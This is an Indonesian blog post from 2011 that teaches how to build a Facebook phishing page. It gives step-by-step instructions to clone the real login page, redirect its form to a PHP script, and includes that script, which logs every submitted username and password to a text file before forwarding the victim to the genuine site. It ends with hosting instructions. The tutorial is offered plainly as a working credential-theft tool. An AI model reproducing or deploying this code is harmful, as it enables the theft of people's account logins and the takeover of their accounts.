Minggu, 11 Desember 2011

Cara Membuat Web Phising

Cara Membuat Web Phising |Topik Cara Membuat Web Phising kalau di bawakan pada jaman sekarang hampir sama dengan Jebakan Batman.. Cara membuat Web Phising Facebook. Yups postingan kali inisaya akan membahas tentang cara membuat web phising. walau pun ini sudah berita lama yang banyak orang sudah mengetahuinya. Tapi saya yakin masih banyak yang membuatuhkan pengetahuan tentang cara membuat web phising seperti yang anda baca sekarang ini. Apakah anda sudah tau apa itu web phising ?? web phisng = web + phising Web  menurut saya adalah sebuah page yang berisi content yang di isi oleh admin. ( menurut saya ) lebih lengkapnyakesini. Phising menurut dari yang saya baca phising  berasal dari kata fishing atau di bahasa indonesia kan yang memiliki arti memancing. Memancing ? ternyata memang benar kita membuat web untuk memancing korban untuk masuk dalam web phising yang telah kita buat. Cara buatnya gimana ? Baik saya akan kasih tahu cara membuat web phising. Langkah – langkahnya sebagai berikut :
phishing facebook Cara Membuat Web Phising
  1. Cari dan buka alamat yang mau di jadiin hompage / halaman utama web phising anda. misal http://facebook.com.
  2. Setelah halaman terbuka sepenuhnya anda tekal tombol Ctrl + U di keyboard secara bersamaan. Kemudian akan muncul Source Code-nya.
  3. Copy semua Source Code yang terdapat di web tersebut. Ctrl + A ( untuk blok all ) kemudian Crtl + C ( untuk meng-copy / menyaslin Source Code tersebut ).
  4. Setelah itu buka notepad/wordpad ( Start – all program – accessories- Notepad/Wordpad)  di windows atau gedit ( Applications –  Accessories – Gedit Text Editor ) di linux ( yang pake gedit ).
  5. Paste Source Code yang sudah di copy tadi. seperti langkah nomor 3.
  6. Cari menggunakan Crtl + F, isi dengan “action=” ( tanpa tanda petik )
  7. Ketemu
    1<form action="URL WEB ASLI" method="post">
  8. Ganti URL WEB ASLI dengan phising.php ( phising.php hanya perumpamaan, bisa anda ganti namun harus semua dengan kata phising.php nantinya di ganti dengan nama.phpanda ).
  9. Ubah “post” menjadi “GET“.
  10. Save as ( file – save as ) atau tekan Ctrl + S. ( ingat file harus di ubah menjadi html )
  11. Buka notepad lagi ( langkah sama seperti nomor 4 ).
  12. copas code php ini ke notepad :
    1<?php header("Location: http://URL WEB ASLI"); $handle = fopen("passwords.txt""a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
  13. Ganti http://URL WEB ASLI dengan http://facebook.com misal.
  14. Save dengan nama phising dan extensi .php jadinya phising.php
  15. Upload ke hostingan anda. Baca disini untuk Cara Upload File di Free Hosting 000webhost.
  16. Jangan lupa permission di atur 777 untuk file passwords.txt
  17. Selesai
Anda telah selesai membuat web phising kalo anda masih bingung jangan malu bertanya. Tuliskan di kotak komentar di bawah ini.

Sumber Artikel : http://kentos.web.id/cara-membuat-web-phising/

0 comments:

Poskan Komentar